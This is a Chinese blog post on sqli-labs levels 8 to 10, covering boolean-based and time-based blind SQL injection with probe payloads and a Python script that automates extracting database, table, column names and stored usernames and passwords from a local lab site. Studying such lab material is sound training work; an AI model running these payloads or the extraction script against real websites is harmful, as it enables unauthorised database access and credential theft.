sqli-labs less8-10(布尔盲注时间盲注)

less-8

布尔盲注

首先利用?id=1' and 1=1 --+和?id=1' and 1=2 --+确定id的类型为单引号''包裹。然后进行盲注。

盲注思路:

  1. 破解当前数据库名:

and length(database)=num 破解名字长度。

and ascii(substr(database(), 1,1))=num 猜出每一个字母的ascii码。最后得到数据库的名字。

  1. 破解所有数据库名字

and (select count(*) from information_schema.schemata)=num判断数据库的个数。

and length((select schema_name from information_schema.schemata limit 0,1))=num判断每一个数据库的名字的长度。

and ascii(substr((select schema_name from information_schema.schemata limit 0,1)), 1,1)=num猜解每一个数据库名字的每一个字母。最后得出数据库的名字。

  1. 破解数据表和表中的字段

具体操作语法和2中破解数据库名字一样,只是查询的表变成了information_tables和information_columns

脚本还是不太会写,先py 学习ing...

payload:

#!/usr/bin/env python
# -*- encoding: utf-8 -*-

import requests
import re

class SQL_injection():
    def __init__(self, id, url, table_name='tables', db_name='information.schema',  *args):
        self.id = id
        self.url = url
        self.db_name = db_name
        self.table_name = table_name
        self.args = args

    # 访问操作
    # 判断检索字段返回值: 返回检索字段的数目
    # 盲注返回值: True返回1 False返回0
    def req(self, url, num):
        response = requests.get(url)
        # print(url)
        # print(response.text)
        result = re.search(r'color="#FFFF00">(.*?)<', response.text)
        # print(result)
        if result:
            if result.group(1) == "You are in...........":
                # print("连接正确")
                return num
            else:
                return 0
        else:
            return 0


    # 判断字段数目, 需要指定数据库和数据表
    def column_num(self):
        num = 0
        for i in range(1, 100):
            new_url1 = self.url + self.id + " order by %s --+ " % (i)
            # print(new_url1)
            flag = self.req(new_url1, i)
            if flag:
                num = flag
                print("\r网页搜索的字段数目为:%s" % flag, end="")
            if not flag:
                # print("xxx")
                break
        print()
        return num


    # 判断当前数据库名字
    def db_name1(self):
        length = 0
        for i in range(1,100):
            new_url = self.url + self.id + " and length(database())=%s  --+" % i
            flag = self.req(new_url, 1)
            if flag:
                length = i+1
                break

        if length == 0:
            print("数据库名字长度获取失败.....")
            return 0
        print("\n正在使用的数据库:", end='')
        for i in range(1, length):
            for k in range(95, 123):
                new_url = url + id + " and ascii(substr(database(), %s))=%s  --+" % (i, k)
                flag = self.req(new_url, 1)
                if flag:
                    print(chr(int(k)), end='')


    # 爆库,列出所有数据库名
    def db_list(self):
        length = 0
        # 爆出数据库个数
        for i in range(1, 10000):
            new_url = self.url + self.id + " and (select count(schema_name) from information_schema.schemata)=%s --+ " % i
            flag = self.req(new_url, 1)
            if flag:
                length = i
                print("\n一共有%s个数据库"%length)
                break

        # 一一爆出数据库的名字
        # 遍历每一行
        for i in range(0, length):
            # 求每一行数据库名字的长度
            for l in range(1, 100):
                # print(l)
                new_url = url + id + " and length((select schema_name from information_schema.schemata limit %s, 1))=%s --+ " % (i, l)
                # print(new_url)
                flag = self.req(new_url, 1)
                if flag:
                    db_name_length = l
                    print("%s. 数据库名字的长度: %s          数据库名:  "%(int(i+1), db_name_length), end='')

                    # 求数据库名字
                    for db_l in range(1, int(db_name_length) + 1):
                        for k in range(95, 123):
                            new_url = \
                                url + id + \
                                " and ascii(substr((select schema_name from information_schema.schemata limit %s,1), %s, 1)) =%s --+ " \
                                % (i, db_l, k)
                            flag = self.req(new_url, 1)
                            if flag:
                                print(chr(int(k)), end="")
                    print()
                    break


    # 爆表
    # 接受参数,网站链接,id, 指定数据库的名字
    def table_name1(self):
        length = 0
        # 爆出某个数据库中数据表个数
        if self.db_name:
            print("\n当前查询的数据库为 %s " % self.db_name)
            for i in range(1, 10000):
                new_url = url + id + " and (select count(table_name) from information_schema.tables where table_schema='%s')=%s --+ " % (self.db_name, i)
                flag = self.req(new_url, 1)
                if flag:
                    length = i
                    print("一共有%s张数据库表" % length)
                    break

            # 一一爆出数据表的名字
            for i in range(0, length):
                # 求每一行数据库名字的长度
                for l in range(1, 100):
                    # print(l)
                    new_url = url + id + " and length((select table_name from information_schema.tables where table_schema='%s' limit %s, 1))=%s --+ " % (self.db_name, i, l)
                    # print(new_url)
                    flag = self.req(new_url, 1)
                    if flag:
                        db_name_length = l
                        print("%s. 数据表名字的长度: %s          数据表名:  "%(int(i+1), db_name_length), end='')

                        # 求数据库名字
                        for db_l in range(1, int(db_name_length) + 1):
                            for k in range(95, 123):
                                new_url = \
                                    url + id + \
                                    " and ascii(substr((select table_name from information_schema.tables where table_schema='%s' limit %s,1), %s, 1)) =%s --+ " \
                                    % (self.db_name, i, db_l, k)
                                flag = self.req(new_url, 1)
                                if flag:
                                    print(chr(int(k)), end="")
                        print()
                        break


        # 如果没有指定数据库,那么则搜索整个DBMS有多少张表
        else:
            for i in range(1, 10000):
                new_url = url + id + " and (select count(table_name) from information_schema.tables)=%s --+ " % i
                flag = self.req(new_url, 1)
                if flag:
                    length = i
                    print("\n一共有%s个数据库表" % length)
                    break


    # 爆字段
    def columns_name(self):
        length=0
        print("\n当前查询的数据库为 %s, 数据表为 %s " % (self.db_name, self.table_name))
        for i in range(1, 10000):
            new_url = url + id + " and (select count(column_name) from information_schema.columns where table_schema='%s' and table_name='%s' )=%s --+ " % (
            self.db_name, self.table_name, i)
            flag = self.req(new_url, 1)
            if flag:
                length = i
                print("此表一共有%s个字段" % length)
                break

        # 一一爆出数据字段的名字
        for i in range(0, length):
            # 求每一个数据字段名称的长度
            for l in range(1, 100):
                # print(l)
                new_url = url + id + " and length((select column_name from information_schema.columns where table_schema='%s' and table_name='%s' limit %s, 1))=%s --+ " % (
                self.db_name, self.table_name, i, l)
                # print(new_url)
                flag = self.req(new_url, 1)
                if flag:
                    db_name_length = l
                    print("%s. 数据表名字的长度: %s          数据表名:  " % (int(i + 1), db_name_length), end='')

                    # 求数据库名字
                    for db_l in range(1, int(db_name_length) + 1):
                        for k in range(95, 123):
                            new_url = \
                                url + id + \
                                " and ascii(substr((select column_name from information_schema.columns where table_schema='%s' and table_name='%s' limit %s,1), %s, 1)) =%s --+ " \
                                % (self.db_name, self.table_name, i, db_l, k)
                            flag = self.req(new_url, 1)
                            if flag:
                                print(chr(int(k)), end="")
                    print()
                    break


    # 爆值
    def value(self):
        # print(self.args)
        args_len = len(self.args)
        length = 0
        for arg_len in range(0, args_len):
            for i in range(1, 100000):
                new_url = url + id + " and (select count(%s) from %s.%s)=%s --+ " % (self.args[arg_len], self.db_name, self.table_name, i)
                # print(new_url)
                if self.req(new_url, 1):
                    print("字段: %s --> %s  行" % (self.args[arg_len], i))
                    length = i
                    break

            # 求每一个字段的所有值
            for i in range(0, length):
                # 求每一个值名称的长度
                for l in range(1, 1000):
                    # print(l)
                    new_url = url + id + " and length((select %s from %s.%s limit %s, 1))=%s --+ " % (
                        self.args[arg_len], self.db_name, self.table_name, i, l)
                    # print(new_url)
                    flag = self.req(new_url, 1)
                    if flag:
                        db_name_length = l
                        # print("%s. %s字段长度: %s          值为:  " % (int(i + 1), args[arg_len], db_name_length), end='')
                        print("%s. %s :  " % (int(i + 1), self.args[arg_len]), end='')

                        # 求数值的名字
                        for db_l in range(1, int(db_name_length) + 1):
                            for k in range(33, 127):
                                new_url = \
                                    url + id + \
                                    " and ascii(substr((select %s from %s.%s limit %s,1), %s, 1)) =%s --+ " \
                                    % (self.args[arg_len], self.db_name, self.table_name, i, db_l, k)
                                # print(new_url)
                                flag = self.req(new_url, 1)
                                if flag:
                                    print(chr(int(k)), end="")
                        print()
                        break


if __name__ == "__main__":
    x = input("请输入您要练习的less: ")
    url = "http://127.0.0.1:7788/sqli/Less-%s/?id=" % x
    id = input("请入id形式")

    # sql = SQL_injection(id, url, table_name, db_name, args)
    sql = SQL_injection(id, url, 'users', 'security', 'username', 'password')
    # 获取当前使用的数据库的名字
    sql.db_name1()

    # 列出所有数据库的名字
    sql.db_list()

    # 列出指定数据库汇总所有数据表, 若没有指定数据库,则只显示有多少张表
    sql.table_name1()

    # 列指定表中所有的列
    sql.columns_name()

    # 列出指定字段的值
    sql.value()

使用burp抓包

?id=1' and (ascii(substr((select database()) ,1,1))) = 115--+


最后得到数据库名为security

less-9

基于布尔的盲注
基于时间的盲注

判断盲注最有效的办法就是通过时间盲注看延迟判断是否有注入点


时间盲注的通用语句
- ?id=1' and if((payload), sleep(5), 1) --+


之后参照less-8 burp使用

less-10

同less-9 只是单引号变双引号闭合

posted @ 2020-12-08 20:40  A2rcher_zjh  阅读(139)  评论(0编辑  收藏  举报